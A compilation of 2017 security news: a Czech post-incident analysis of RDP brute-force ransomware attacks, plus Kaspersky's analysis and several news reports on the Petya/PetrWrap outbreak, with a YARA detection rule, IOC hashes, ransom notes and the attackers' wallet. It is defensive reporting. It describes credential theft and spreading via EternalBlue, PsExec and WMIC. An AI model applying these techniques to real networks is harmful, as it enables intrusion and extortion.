ALL YOUR IMPORTANT FILES ARE ENCRYPTED. For more information, open the file „HOW TO DECRYPT FILES.html“ on the desktop or any other folder with encrypted files.
Tento soubor dále obsahoval kontaktní e-mail umístěný na nějaké exotické doméně (india.com, asia.com a další) a číslo bitcoinové peněženky, pro každý útok jedinečné. Při rozhovoru s administrátory těchto napadených systémů většina tvrdila, že jediný způsob, jak jejich systémy mohly být napadeny, byl přes e-mail. Incident se prý odehrál tak, že sekretářka otevřela zavirovaný e-mail a neštěstí bylo na světě. Bohužel, skutečnost byla jiná. Společným jmenovatelem asi 15 napadených serverů, které jsem měl možnost analyzovat, byl operační systém MS Windows ve verzích 2008, 2008R2, 2012 Server a Small Business Server. Dále byla spuštěna vzdálená plocha RDP na portu 3389.

Některé napadené firmy se pokusily kontaktovat útočníka na uvedeném e-mailu. Komunikace probíhala vždy v angličtině a vždy byla krátká, proto z ní nelze určit, zda angličtina je rodným jazykem útočníka. Reakční doba na e-mail byla vždy hodinu až dvě. Částka v bitcoinech byla různá, od 2 do 4 bitcoinů. Jedna z napadených firem dokázala usmlouvat částku za dešifrování souborů na 0,8 bitcoinu. Zaplatit či nezaplatit, je věčné dilema. Obecně je doporučováno neplatit a tím nepodporovat autory malwaru. Bohužel, pro některé firmy byla data natolik významná, že se rozhodly zaplatit.

Po zaplacení domluvené finanční částky v bitcoinech poškozené firmy obdržely e-mailem binární exe soubor, který administrátoři měli na napadeném systému spustit a tím zjistit jedinečné ID, které se mělo zaslat na útočníkům e-mail. Poté jim byl vygenerován unikátní binární exe soubor na dešifrování souborů. Číselné ID byl pravděpodobně veřejný klíč použité asymetrické kryptografie. Jak pachatelé slíbili, tak i splnili a firmy, které zaplatily, získaly zpět své soubory. Tím, že distribuoval soubory pro dešifrování přes email, vyhnul se útočník vytváření řídicích C&C serverů a tím v podstatě ušetřil.

Analýza dat
Od napadených firem byly vyžádány disky ze serverů (případně virtuální disky), netflow, log z hraničního routeru, případně další individuální data. Bohužel většina napadených firem neshromažďovala netflow, hraniční routery byly SOHO zařízení (případně VDSL modemy od operátora), takže síťových logů moc nebylo. Některé firmy byly omezeny kapacitou diskového prostoru, a proto smazaly napadené servery dříve, než se z nich mohla vytvořit záloha pro analýzu. Jak jsem již zmínil výše, ransomware vynechal adresář C:\Windows a díky tomu byly k dispozici Event Log EVTX (prohlížeč událostí).

Analýzou dat (celá probíhala v Linuxu) bylo zjištěno, že slabé místo napadených serverů byl otevřený port 3389, na který útočník provedl slovníkový útok. V několika případech byl před lety nainstalován čistý operační systém se slabým administrátorským heslem a poté byl stroj přidán do domény. Bohužel, slabé heslo administrátora již zůstalo. Dále v několika případech byla na pokyn vedení firmy vypnutá bezpečnostní politika hesel (složitost, uzamykání hesla apod.). V průběhu analýzy všech dat bylo zjištěno, že k těmto útokům kupodivu došlo již v průběhu října až prosince loňského roku, ale samotné šifrování dat proběhlo až z počátku roku 2017. První útok byl zaznamenán již v srpnu, kdy díky všímavosti administrátora systému nebyl dokončen.

Také bylo vidět, jak se útočník postupně zlepšuje. Ze začátku využíval účtu administrator nebo admin a postupně zjišťoval, že by se tím mohl lehce prozradit. Začal si vytvářet různé nové uživatele s různé názvy jako test, ss, system, adm.smallbusiness, diablo, ssystem, sbs1 a podobně.

Po úspěšném překonání hesla útočník využil napadený server ke svým účelům a nesnažil se po sobě ani příliš uklízet. Díky tomu byly nalezeny na ploše Windows různé nástroje jako aplikace na proklik reklam, nástroj pro distribuovaný útok na bitcoinovou směnárnu, IP skenery pro skenování rozsahu adres, nástroje RDPBrute pro slovníkový útok, GeoIP databáze s rozsahy IP adres pro sken, různé slovníky vhodné pro slovníkový útok a dále seznam proxy serverů pro anonymizaci. Některé tyto soubory měly názvy psané azbukou. Při vyhledání názvů v Google byly nalezeny odkazy ke stažení těchto souborů na ruských diskuzních fórech.

Aby nebyl útočník obtěžován hláškami antiviru, byly použity unlockery na odblokování zamčených souborů v systému. Díky tomu pak bylo možné smazat jakýkoliv zamčený soubor a tím mohl útočník jednoduše poškodit antivir tak, aby byl nefunkční. V okamžiku, kdy útočník server již nepotřeboval, vypnul službu shadow copy service (aby nebylo možné jednoduše obnovit soubory) a spustil ručně proces šifrování.

I zde v průběhu času došlo k vývoji. Ruční spouštění aplikací postupně nahrazovaly různé cmd a powershellové skripty. Samotný cryptoransomware potřeboval ke své činnosti nainstalované knihovny MS Visual C++ 2010 nebo novější. V jednom případě byl napaden hypervisor VMWaru, na kterém běžely jak MS Windows, tak i Linux. A jelikož pro linux neměl útočník funkční cryptoransomware, vymazal jednoduše celý virtuální server včetně virtuálního disku.

Všechny IP adresy, ze kterých byl proveden jak úspěšný, tak neúspěšný útok, byly analyzovány mimo jiné i v Shodanu, kdy bylo zjištěno, že většina útočících IP adres má otevřený port 3389 a tudíž se jedná o stejně napadené servery. IP adresy byly z celého světa, převládaly IP adresy z Ruska a Ukrajiny a dále z USA, Kanady, Iránu, Seychel atd. Dále byly využity anonymizéry StrongVPN a CyberGhost. Jedna IP adresa patřila lékařskému zařízení na ozařování onkologicky nemocných kdesi v Indonésii.

Poučení pro příště
Jelikož je provedení podobného útoku velmi jednoduché, mezi touto sérií se objevily dva odlišné případy, kdy byl po úspěšném ovládnutí systému spuštěn open-source software Diskcryptor, který se běžně používá pro legitimní šifrování diskového oddílu. Poté i tento útočník vyžadoval platbu v bitcoinech. Po úspěšném převodu peněz zaslal hesla, která byla ručně zadaná při šifrování oddílu. Složitost takových hesel nebyla nijak vysoká (max. 6 znaků), v jednom případě obsahovalo toto heslo dokonce pouze čísla.

Poučení pro všechny: Dle mého názoru nepatří žádná služba pro administraci celého firemního systému na veřejnou IP adresu. Pokud je nutný přístup z internetu, je potřeba použít VPN se silným ověřováním pomocí certifikátu (OpenVPN, L2TP/IPSec …). Dále je důležité se zamyslet nad zálohováním. Nestačí jen zálohovat, ale zároveň přemýšlet nad bezpečností a také integritou uložených záloh.

V době, kdy se tyto útoky rozeběhly (tj. leden 2017), jsem si udělal přehled v Shodan.io. Vyhledal jsem si IP adresy s otevřeným port 3389 v lokalitě jednoho krajského města. Ve výsledcích lze v Shodanu u některých IP adres vidět i uživatelská jména. Tím má potenciální útočník významně usnadněnou činnost. Stejné vyhledávání v Shodanu jsem zopakoval za tři měsíce a zjistil jsem nárůst otevřených portů 3389 (RDP) o 30 %, což je hodně znepokojivé. Pokud nezačnou administrátoři dbát více na bezpečnost, můžeme se v budoucnu dočkat dalších podobných útoků.


Schroedinger’s Pet(ya)
28.6.2017 Kaspersky
Ransomware

DATA ENCRYPTION MALWARE DESCRIPTIONS MBR PETYA RANSOMWARE VULNERABILITIES AND EXPLOITS
Earlier today (June 27th), we received reports about a new wave of ransomware attacks spreading around the world, primarily targeting businesses in Ukraine, Russia and Western Europe. If you were one of the unfortunate victims, this screen might look familiar:
 

Kaspersky Lab solutions successfully stop the attack through the System Watcher component. This technology protects against ransomware attacks by monitoring system changes and rolling back any potentially destructive actions.

At this time, our telemetry indicates more than 2,000 attacks:
 

Our investigation is ongoing and our findings are far from final at this time. Despite rampant public speculation, the following is what we can confirm from our independent analysis:

How does the ransomware spread?

To capture credentials for spreading, the ransomware uses custom tools, a la Mimikatz. These extract credentials from the lsass.exe process. After extraction, credentials are passed to PsExec tools or WMIC for distribution inside a network.

Other observed infection vectors include:

A modified EternalBlue exploit, also used by WannaCry.
The EternalRomance exploit – a remote code execution exploit targeting Windows XP to Windows 2008 systems over TCP port 445 (Note: patched with MS17-010).
An attack against the update mechanism of a third-party Ukrainian software product called MeDoc.
IMPORTANT: A single infected system on the network possessing administrative credentials is capable of spreading this infection to all the other computers through WMI or PSEXEC.

What does the ransomware do?

The malware waits for 10-60 minutes after the infection to reboot the system. Reboot is scheduled using system facilities with “at” or “schtasks” and “shutdown.exe” tools.
 

Once it reboots, it starts to encrypt the MFT table in NTFS partitions, overwriting the MBR with a customized loader with a ransom note. More details on the ransom note below.

Network survey

The malware enumerates all network adapters, all known server names via NetBIOS and also retrieves the list of current DHCP leases, if available. Each and every IP on the local network and each server found is checked for open TCP ports 445 and 139. Those machines that have these ports open are then attacked with one of the methods described above.

Password extraction

Resources 1 and 2 of malware binary contain two versions of a standalone tool (32-bit and 64-bit) that tries to extract logins and passwords of logged on users. The tool is run by the main binary. All extracted data is transferred back to the main module via a named pipe with a random GUID-like name.

File Decryption

Are there any hopes of decrypting files for victims already infected? Unfortunately, the ransomware uses a standard, solid encryption scheme so this appears unlikely unless a subtle implementation mistake has been made. The following specifics apply to the encryption mechanism:

For all files, one AES-128 key is generated.
This AES key is encrypted with threat actors’ public RSA-2048 key.
Encrypted AES keys are saved to a README file.
Keys are securely generated.
The criminals behind this attack are asking for $300 in Bitcoins to deliver the key that decrypts the ransomed data, payable to a unified Bitcoin account. Unlike Wannacry, this technique would work because the attackers are asking the victims to send their wallet numbers by e-mail to “wowsmith123456@posteo.net”, thus confirming the transactions. We have seen reports this email account has already been shut down, effectively making the full chain decryption for existing victims impossible at this time.
 

At the time of writing, the Bitcoin wallet has accrued 24 transactions totalling 2.54 BTC or just under $6,000 USD.

Here’s our shortlist of recommendations on how to survive ransomware attacks:

Run a robust anti-malware suite with embedded anti-ransomware protection such as System Watcher from Kaspersky Internet Security.
Make sure you update Microsoft Windows and all third party software. It’s crucial to apply the MS17-010 bulletin immediately.
Do not run open attachments from untrusted sources.
Backup sensitive data to external storage and keep it offline.
For sysadmins, our products detect the samples used in the attack by these verdicts:

Trojan-Ransom.Win32.PetrWrap.d
HEUR:Trojan-Ransom.Win32.PetrWrap.d
PDM:Trojan.Win32.Generic
UDS: DangerousObject.Multi.Generic
Intrusion.Win.MS17-010.e
IOCs

71B6A493388E7D0B40C83CE903BC6B04
0df7179693755b810403a972f4466afb
42b2ff216d14c2c8387c8eabfb1ab7d0
E595c02185d8e12be347915865270cca
e285b6ce047015943e685e6638bd837e

Yara rules

rule ransomware_PetrWrap {
meta:

copyright = "Kaspersky Lab"
description = "Rule to detect PetrWrap ransomware samples"
last_modified = "2017-06-27"
author = "Kaspersky Lab"
hash = "71B6A493388E7D0B40C83CE903BC6B04"
version = "1.0"

strings:

$a1 = "MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV/uHB0ZrlQ/wcYJBwLhQ9EqJ3iDqmN19O
o7NtyEUmbYmopcq+YLIBZzQ2ZTK0A2DtX4GRKxEEFLCy7vP12EYOPXknVy/+mf0JFWixz29QiTf5oLu15wVLONCuEibGaNNpgq+CXsPwfITDbDDmdrRIiUEUw6o3pt5pNOskfOJbMan2TZu" fullword wide
$a2 = ".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.
pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls" fullword wide
$a3 = "DESTROY ALL OF YOUR DATA! PLEASE ENSURE THAT YOUR POWER CABLE IS PLUGGED" fullword ascii
$a4 = "1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX" fullword ascii
$a5 = "wowsmith123456@posteo.net." fullword wide

condition:

uint16(0) == 0x5A4D and
filesize < 1000000 and any of them }


Nová globální epidemie ransomwaru tentokrát ohrožuje i Česko

28.6.2017 SecurityWorld Viry
Nový vyděračský malware útočí hlavně na větší firmy – ohrožený je tak bankovní sektor, energetické či poštovní společnosti.

Podle Esetu například Ukrajina hlásí mimořádné výpadky IT v bankovním sektoru, energetických rozvodných sítích a poštovních společnostech.

Mezi významně postiženými zeměmi je i Itálie, Izrael, Srbsko, ale také země střední a východní Evropy včetně České republiky. Ta byla při vrcholu nákazy na deváté příčce žebříčku nejvíce zasažených států.

Rozsah škod způsobených novým typem ransomware ještě nebyl potvrzen, experti včera nezaznamenali žádné zprávy o výpadcích dodávek elektrické energie, jako tomu bylo dříve u nechvalně proslulého malware Industroyer.

Útok se ale rozhodně nesoustředí jen na několik vybraných zemí, postiženo je i Španělsko, Indie a velké potíže hlásí dánská námořní společnosti Maersk či britská reklamní společnost WPP.

„Nový ransomware připomíná známý škodlivý kód Petya. Když se mu podaří infiltrovat do MBR (Master boot record), hlavního spouštěcího záznamu počítače, zašifruje celý disk. V opačném případě šifruje jednotlivé soubory, stejně jako ransomware Mischa,“ říká Robert Lipovský, analytik Esetu. Tvůrci kódu žádají od obětí platbu 300 dolarů, jinak napadená zařízení neodšifrují.

Také experti firmy Check Point potvrzují pravděpodobnou podobnost s ransomwarem Petya, který namísto šifrování jednotlivých souborů rovnou zašifruje celý pevný disk.

Check Point podle svých slov zjistil zapojení bota Loki, který byl použit ke krádežím přihlašovacích údajů. „Naše analýza potvrdila, že ransomware zneužívá pro své šíření SMB zranitelností,“ říká Daniel Šafář z Check Pointu.

To potvrzuje i Eset - nový ransomware se podle něj šíří prostřednictvím kombinace SMB exploitu, který využíval i nechvalně známý ransomware WannaCry, jehož útok zasáhl před více než měsícem na 200 milionů počítačů, a programu PsExec, což je nástroj pro vzdálenou instalaci a spouštění libovolných aplikací.

„Tato nebezpečná kombinace může být důvodem, proč se tato epidemie velmi rychle šíří po celém světě, a to i poté, co předchozí útok WannaCry široce medializoval problematiku ransomwaru a většina zranitelností již byla záplatována,“ vysvětluje Lipovský.

Škodlivému kódu podle něj stačí, aby infikoval jediný počítač a dostal se tak do firemní sítě, kde pak malware může získat administrátorská práva a šíří se do dalších počítačů.


Israeli Spy Agency Creates Fund to Invest in Tech Firms

28.6.2017 securityweek BigBrothers
Israel's Mossad spy agency is starting a fund to invest in technology firms creating products that could assist its work, including those involving robotics and encryption, the prime minister's office said Tuesday.

The fund, to be called Libertad, will invest in research and development programs at "cutting-edge technology startup companies," a statement said.

It said it was calling on firms to submit proposals, particularly in areas including robotics, encryption and personality profiling.

The statement said Mossad would not publicise the names of the firms in which it invests.

It said Libertad would be open to anyone and provided an email address to submit proposals (apply@libertad.gov.il), adding that it would offer up to two million shekels ($570,000, 500,000 euros) for projects.

More could be granted for exceptional cases, it said.

It will not act as a typical investor.

Libertad will not hold equity in the firms in which it invests and will instead receive a license to use the technology developed, it said.

The CIA in the United States has created a similar investment fund, known as In-Q-Tel.

Israel is seen as a global leader in the technology industry, particularly regarding cyber-defense.

Libertad was the name of a ship that carried Jewish emigrants to what was then British-mandate Palestine in 1940 before the creation of the state of Israel.


Google's $2.73 Billion Fine Demonstrates Importance of GDPR Compliance

27.6.2017 securityweek Privacy
The European Commission (EC) has levied a €2.42 billion ($2.73 billion) fine against Google because it "has abused its market dominance as a search engine by giving an illegal advantage to another Google product, its comparison shopping service."

While this is an antitrust action, it raises the possibility of similarly large fines under the General Data Protection Regulation coming into force in less than a year's time. That new regulation can set sanctions at up to 4% of a firm's annual global turnover. While this would rarely reach the level of today's fine against Google in absolute terms, it provides the potential for proportionately similar fines against a far larger number of companies than those that might be caught by antitrust regulations.

Today's fine was levied because the EC concluded that firstly, "Google is dominant in general internet search markets throughout the European Economic Area;" and that secondly, "Google has abused this market dominance by giving its own comparison shopping service an illegal advantage."

Google can, and almost certainly will, appeal the decision. In a statement emailed to SecurityWeek, Kent Walker, SVP and General Counsel, commented, "When you shop online, you want to find the products you're looking for quickly and easily. And advertisers want to promote those same products. That's why Google shows shopping ads, connecting our users with thousands of advertisers, large and small, in ways that are useful for both. We respectfully disagree with the conclusions announced today. We will review the Commission's decision in detail as we consider an appeal, and we look forward to continuing to make our case."

The level of the fine was calculated on the basis of a specified formula. "The Commission's fine of €2,424,495,000," explains the EC announcement, "takes account of the duration and gravity of the infringement. In accordance with the Commission's 2006 Guidelines on fines... the fine has been calculated on the basis of the value of Google's revenue from its comparison shopping service in the 13 EEA countries concerned."

It is this use of a known formula that allows us to speculate on any future GDPR fines (for any infringer and not just Google). "Does this case give us any entree as to how the Commission might behave in setting fines when GDPR is in force?" asks Brian Bandey, a Doctor of Law specializing in International IP and cyber issues. "Well we can say that the Commission followed its 2006 'Guidelines on the method of setting fines' with respect to Google."

When they came into force, competition commissioner Neelie Kroes said about them: "These revised Guidelines will better reflect the overall economic significance of the infringement... the link between the fine and the duration of the infringement, and the increase for repeat offenders -- send three clear signals to companies. Don't break the anti-trust rules; if you do, stop it as quickly as possible, and once you've stopped, don't do it again."

Bandey continues, "My personal expectation is that the same approach will be taken with respect to GDPR fines. The EU States hold the concept of individual personalty and their consequent rights very highly. In a sense, that is the moving force behind the GDPR. In the European Commission Fact Sheet on this subject (24th May 2017): 'The reform provides tools for gaining control of one's personal data, the protection of which is a fundamental right in the European Union.'

"In that sense," he adds, "I expect that they will link penalties for breaching these 'fundamental rights' to duration, effects on involved persons, and repeat offending." And as Kroes said, it would be best for companies who breach GDPR to stop as quickly as possible, and not breach it again.

Not everyone thinks that this anti-trust fine will provide a benchmark for future GDPR fines. Dr Monica Horten, a visiting fellow at the London School of Economics, stresses the fundamental difference between the laws. "With this Google fine," she said, "this is a corporation abusing its dominant market position. The underlying motivation is about deliberately seeking to gain market advantage, and simultaneously disadvantaging its competitors. It was a deliberate, proactive move to cut out competition.

"GDPR fines," she continued, "will be imposed by national regulators responsible for data protection in Member States. The GDPR gives national regulators a range of measures they can take before they resort to a fine. With GDPR, the root is more likely to lie in some form of corporate management failure, either through neglect or making false economies and cost-cutting." The implication is that the regulators will be slow to deliver the full force of the regulation.

But that doesn't mean that companies can afford to relax concern about GDPR. With this fine, explains David Flint, senior partner at law firm MacRoberts LLP, "the Commission has sent out a clear signal that it is not afraid to take on the largest entities who it perceives to be breaching EU law. With the introduction of the GDPR next year and its potential for penalties of up to 4% of worldwide turnover, there can be little doubt that US businesses need to take compliance with EU law, be it Data Protection or Antitrust, very seriously.

"Both the GDPR and the Antitrust rules envisage follow-on private actions for damages, so the potential risk, legal, financial and reputational may be significantly higher."

"But let me be absolutely clear," adds Bandey; "nobody really know. But we will do in the not-so-distant future."


A new massive attack allegedly based on Petwrap #ransomware hits organizations in several states
27.6.2017 securityaffairs
Ransomware
A new wave of cyber attacks is shocking the IT industry, a massive attack leveraging the Petwrap ransomware has infected systems across the world.
A new wave of cyber attacks is shocking the IT industry, a few weeks after the WannaCry massive attack, security experts are facing a new threat that is rapidly spreading.

Once again it is a ransomware that is infecting computers worldwide making chaos, systems at banks, power suppliers and businesses in Europe, Russia, Ukraine, and India have been targeted by Petwrap.

The Petwrap ransomware is a variant of the notorious Petya ransomware that encrypts files demanding $300 in bitcoins to the victims.

Like WannaCry, also Petwrap exploits the Windows SMBv1 vulnerability and the effects appear to be serious on a large scale highlighting the poor level of security of computers worldwide.

According to the security researchers Matt Suiche, founder of cyber security firm Comae Technologies, the malware use the same attack vector exploited by EternalBlue and the accompanying DoublePulsar rootkit.


Matthieu Suiche ✔ @msuiche
Byata builds SMBv1 headers in its code. This smells like ETERNALBLUE/DOUBLEPULSAR all over again. Will confirm shortly.
4:34 PM - 27 Jun 2017
32 32 Retweets 24 24 likes
Twitter Ads info and privacy
Unlike other ransomware, Petya does not encrypt files on the infected systems but targets the hard drive’s master file table (MFT) and renders the master boot record (MBR) inoperable.

Petya locks the access to the users’ data by encrypting the master file table (MFT) and replaces the computer’s MBR with its own malicious code that displays the ransom note.

Petya overwrites the MBR of the hard drive causing Windows to crash. When the victim tries to reboot the PC, it will impossible to load the OS, even in Safe Mode.

Below the ransom note that was displayed by the Petwrap ransomware:

“If you see this text, then your files are no longer accessible, because they are encrypted. Perhaps you are busy looking for a way to recover your files, but don’t waste your time. Nobody can recover your files without our decryption service.”

Petwrap ransomware

Another bad news is that currently, only a small portion of antivirus is able to detect the threat, according to VirusTotal, only 15 out of 61 anti-virus services are able to detect Petwrap.

News of attacks on financial institutions are circulating on the internet, the National Bank of Ukraine (NBU) is one of the victims of the ransomware.

The Perwrap ransomware has infected systems at Russian state-owned oil company Rosneft, while Ukrainian state electricity suppliers, “Kyivenergo” and “Ukrenergo,” were also targeted by the malware.

“We were attacked. Two hours ago, we had to turn off all our computers. We are waiting for permission from Ukraine’s Security Service (SBU) to switch them back on,” Kyivenergo’s press service said.

Many systems were infected in Ukraine, Ukrainian branch’s mining company Evraz also confirmed the infections along with the Ukraine’s local metro ,and Kiev’s Boryspil Airport.


Kyiv Metro Alerts @kyivmetroalerts
Друзі! Оплата банківськими картками наразі неможлива.
Хакерська атака. https://ain.ua/2017/06/27/kievenergo-i-ukrainskie-banki-podverglis-xakerskoj-atake …
2:00 PM - 27 Jun 2017
Photo published for «Киевэнерго» и украинские банки подверглись хакерской атаке
«Киевэнерго» и украинские банки подверглись хакерской атаке
Компьютерные сети энергокомпании 'Киевэнерго' пострадали от хакерской атаки. Компьютеры компании оказались заражены вирусом, подобным WannaCry. Об этом сообщает 'Интерфакс' со ссылкой на заявление...
ain.ua
79 79 Retweets 27 27 likes
Twitter Ads info and privacy
The giant logistic company Maersk was also targeted by the malware in a serious way.


Maersk @Maersk
2:35 PM - 27 Jun 2017
138 138 Retweets 56 56 likes
Twitter Ads info and privacy
At least three Ukrainian telecommunication operators, LifeCell, Kyivstar, Ukrtelecom, have also reported Petwrap ransomware infections.
While I was writing, different opinions about the threat are circulating on the Internet,

Kaspersky Lab malware analyst Vyacheslav Zakorzhevsky declared that infections were traced to a “new ransomware we haven’t seen before.Stay Tuned.


Petya Ransomware Spreading Rapidly Worldwide, Just Like WannaCry
27.6.2017 thehackernews
Ransomware


Watch out, readers! It is ransomware, another WannaCry, another wide-spread attack.
The WannaCry ransomware is not dead yet and another large scale ransomware attack is making chaos worldwide, shutting down computers at corporates, power supplies, and banks across Russia, Ukraine, Spain, France, UK, India, and Europe and demanding demands $300 in bitcoins.
According to multiple sources, a new variant of Petya ransomware, also known as Petwrap, is spreading rapidly with the help of same Windows SMBv1 vulnerability that the WannaCry ransomware abused to infect 300,000 systems and servers worldwide in just 72 hours.
Petya is a nasty piece of ransomware and works very differently from any other ransomware malware. Unlike other traditional ransomware, Petya does not encrypt files on a targeted system one by one.
Instead, Petya reboots victims computers and encrypts the hard drive's master file table (MFT) and rendering the master boot record (MBR) inoperable, restricting access to the full system by seizing information about file names, sizes, and location on the physical disk.
Petya replaces the computer's MBR with its own malicious code that displays the ransom note and leaves computers unable to boot.
Petya! Petya! Another Worldwide Ransomware Attack

Screenshots of the latest Petya infection shared on Twitter shows that the ransomware displays a text, demanding $300 worth of Bitcoins. Here's what the text read:
"If you see this text, then your files are no longer accessible, because they are encrypted. Perhaps you are busy looking for a way to recover your files, but don't waste your time. Nobody can recover your files without our decryption service."
According to a recent VirusTotal scan, currently, only 13 out of 61 anti-virus services are successfully detecting the Petya virus.
Affected Power Companies:
Petya ransomware has already infected -- Russian state-owned oil giant Rosneft, Ukrainian state electricity suppliers, "Kyivenergo" and "Ukrenergo," in past few hours.
"We were attacked. Two hours ago, we had to turn off all our computers. We are waiting for permission from Ukraine's Security Service (SBU) to switch them back on," Kyivenergo's press service said.
Affected Banks and Financial Institutions:
There are reports from several banks, including National Bank of Ukraine (NBU), Oschadbank; and companies that they have been hit by the Petya ransomware attacks.
Affected Businesses:

Maersk, an international logistics company, has also confined on Twitter that the latest Petya attacks have shut down its IT systems at multiple locations and business units.
"We can confirm that Maersk IT systems are down across multiple sites and business units. We are currently asserting the situation. The safety of our employees, our operations and customers' business is our top priority. We will update when we have more information," the company said.
The ransomware also impacts multiple workstations at Ukrainian branch's mining company Evraz.
The most severe damages reported by Ukrainian businesses also include compromised systems at Ukraine's local metro, and Kiev's Boryspil Airport.
Affected Telecommunication Industry:
Three Ukrainian telecommunication operators, Kyivstar, LifeCell, Ukrtelecom, have also affected in the latest Petya attack.
Petya Victims Are Paying for Unlocking Files

At the time of writing, 9 victims have paid in Bitcoin to '1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX' address for decrypting their files infected by Petya, which total roughly $2700.
How Petya Ransomware Spreading So Fast?
So far, it is not yet confirmed that what's the reason behind the sudden rapid spreading of Petya, but security researchers on Twitter are arguing that like WannaCry, Petya is also exploiting SMBv1 EternalBlue exploit and taking advantage of unpatched Windows machines.
"Petya ransomware successful in spreading because it combines both a client-side attack (CVE-2017-0199) and a network based threat (MS17-010)" HackerFantastic tweeted, security researcher‏.
EternalBlue, a Windows SMB exploit leaked by the infamous hacking group Shadow Brokers in its April data dump, who claimed to have stolen it from the US intelligence agency NSA, along with other Windows exploits.
Microsoft has since patched the vulnerability for all versions of Windows operating systems, but many users remain vulnerable, and a string of malware variants are exploiting the flaw to deliver ransomware and mine cryptocurrency.
Just three days ago, we reported about the latest WannaCry attacks that hit Honda Motor Company and around 55 speed and traffic light cameras in Japan and Australia, respectively.
Well, it is quite surprising that even after knowing about the WannaCry issue for quite a decent amount of time, big corporates and companies have not yet implemented proper security measures to defend against the threat.
How to Protect Yourself from Ransomware attack
What to do immediately? Go and apply those goddamn patches against EternalBlue (MS17-010) and disable the unsecured, 30-year-old SMBv1 file-sharing protocol on your Windows systems and servers.
To safeguard against any ransomware infection, you should always be suspicious of unwanted files and documents sent over an email and should never click on links inside them unless verifying the source.
To always have a tight grip on your valuable data, keep a good back-up routine in place that makes their copies to an external storage device that isn't always connected to your PC.
Moreover, make sure that you run a good and effective anti-virus security suite on your system, and keep it up-to-date. Most importantly, always browse the Internet safely.


Petya Ransomware Outbreak Hits Organizations Globally

27.6.2017 securityweek Ransomware
Organizations worldwide are currently under a cyber-attack involving the year-old Petya ransomware, security experts report.

The attack already hit Ukraine central bank and Russian oil giant Rosneft. Government computers, airports, and large communication companies in Ukraine appear to have been affected as well. US biopharmaceutical giant Merck also confirmed that its network has been compromised as part of the global attack.

Allan Liska, Intelligence Architect, Recorded Future, told SecurityWeek in an emailed statement Spain and France were also hit, and that the first victims in the United States have started to emerge. Other security researchers observed attacks in the UK and India, and expect the outbreak to spread to other countries too.

Follow
Mikko Hypponen @mikko
There are now reports of Petya from Ukraine, Russia, UK, India. Business day starting in USA right now... https://twitter.com/ankit5934/status/879681380686340096 …
4:04 PM - 27 Jun 2017
168 168 Retweets 49 49 likes
Twitter Ads info and privacy

The massive spread comes only one month and a half after WannaCry affected hundreds of thousands of computers worldwide, spreading via a NSA-linked SMB exploit called EternalBlue. According to security company Avira, the currently unfolding attack is using the same exploit to spread like wildfire.

AlienVault also mentions the use of EternalBlue exploit, but notes that no confirmation on this has emerged as of now. The company reveals that the ransomware “leverages ARP scans and PsExec to spread. PsExec is dropped as dllhost.dat.”

Petya was initially spotted in March last year, when it stood out from the crowd because it wasn’t targeting individual files, as most ransomware families do, but was going after the Master Boot Record instead, thus completely cutting users’ access to the infected computers.

The malware was observed performing a two-step encryption process: it would first cause a PC crash with a BSOD and prompt for a reboot, and would manipulate the MBR during the boot-up sequence. Thus, users could avoid having their hard drives encrypted by preventing the computer from rebooting.

A few months later, Petya authors decided to bundle the malware with a ransomware family called Mischa, which would target individual files in the event the reboot failed. Thus, Mischa worked as an insurance policy, and the authors decided to adopt the Ransomware-as-a-Service business model.

By the end of 2016, another Petya variant called Goldeneye emerged, and researchers warned earlier this year of a malware variant called PetrWrap that was leveraging Petya and modifying it “on the fly” to control its execution.

According to Costin Raiu, director of Global Research and Analysis Team at Kaspersky Lab, the newly observed ransomware variant could be PetrWrap, and not the original Petya, while others say the ransomware variant is Petya.A. Raiu also notes that the sample he stumbled upon appears to have been compiled a week ago.

The Petya variant used in this attack demands a $300 ransom from its victims, and the first payments appear to have been made to the hardcoded Bitcoin wallet it uses.

According to Recorded Future’s Liska, other payloads might also be used in the attack: “There are also reports that the payload includes a variant of Loki Bot in addition to the ransomware. Loki Bot is a banking trojan, it steals usernames and passwords as well as other personal data from the victim machine and sends it to a command and control host. Which means this attack not only could make the victim's machine inoperable, it could steal valuable information that an attacker can take advantage of during the confusion.’”


Ukraine Central Bank Says Cyberattack Hits Lenders

27.6.2017 securityweek Cyber
Ukraine's central bank on Tuesday said a cyberattack hit several lenders in the country, hindering operations and leading the regulator to warn other financial institutions to tighten security measures.

"The National Bank of Ukraine has warned banks... about an external hacker attack on the websites of some Ukrainian banks... which was carried out today," the bank said in a statement.

Banks were experiencing "difficulty in servicing customers and performing banking operations" due to the attacks, it said.

"All the financial market participants have taken steps to tighten security measures to counteract these hacker attacks," it said, adding that "banking infrastructure is securely protected" and further attacks "will be efficiently warded off."

Among the banks apparently affected was Oschadbank, one of Ukraine's largest, it said on the website, forcing it to limit services available to clients.

"The bank's services together with the National Bank of Ukraine are putting in maximum effort to reinstate access to all bank services," it said.

Earlier an attack was also reported by the power company in Kiev, Kyivenergo. "We were forced to turn off all of our computers," a company representative told Interfax Ukraine agency.

Ukraine's delivery service company Nova Poshta, which was also attacked Tuesday, identified the virus that hit its computers as Petya.A, a type of ransomware which locks users out of the system and demands purchase of a key to reinstate access.


Apple, Cisco Partner to Improve Cyber Insurance Policies

27.6.2017 securityweek Cyber
Cisco is getting ready for a new journey in cyber insurance, and Apple will be part of it, the company announced this week.

The company didn’t provide specific details on what its customers should be looking for, but David Ulevitch, Vice President for Cisco’s Security Business Group, mentioned in a blog post on Monday that the company is working with leading companies to build the architecture needed to offer "more robust" policies.

“We’re collaborating with insurance industry heavyweights to lead the way in developing the architecture that enables cyber insurance providers to offer more robust policies to our customers,” Ulevitch said.

He also noted that Cisco will enable “continuous security monitoring and a measurable reference architecture,” and that technologies from both Apple and Cisco will be included.

Ulevitch mentioned Cisco’s future cyber insurance intentions in a blog post announcing the Cisco Security Connector app for iPhone and iPad in the enterprise, the latest product to spawn from the company’s collaboration with Apple. Set to arrive this fall, the app should provide “visibility, control, and privacy for iOS devices.”

